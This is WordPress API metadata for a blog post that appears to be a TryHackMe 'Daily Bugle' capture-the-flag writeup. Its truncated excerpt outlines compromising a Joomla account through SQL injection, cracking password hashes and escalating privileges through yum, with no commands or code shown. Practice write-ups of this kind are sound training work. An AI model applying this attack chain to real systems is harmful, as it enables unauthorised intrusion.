Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum. Firstly let&#8217;s do a quick nmap scan to see what ports&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"Daily Bungle writeup from tryhackme.\n#tryhackme #thm #spiderman #DailyBungle #Joomla","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[17,31],"tags":[14,34,33],"class_list":["post-722","post","type-post","status-publish","format-standard","hentry","category-ctf","category-tryhackme","tag-ctf","tag-thm","tag-tryhackme"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paD3U6-bE","_links":{"self":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/722","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=722"}],"version-history":[{"count":2,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/722\/revisions"}],"predecessor-version":[{"id":724,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/722\/revisions\/724"}],"wp:attachment":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=722"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=722"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=722"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}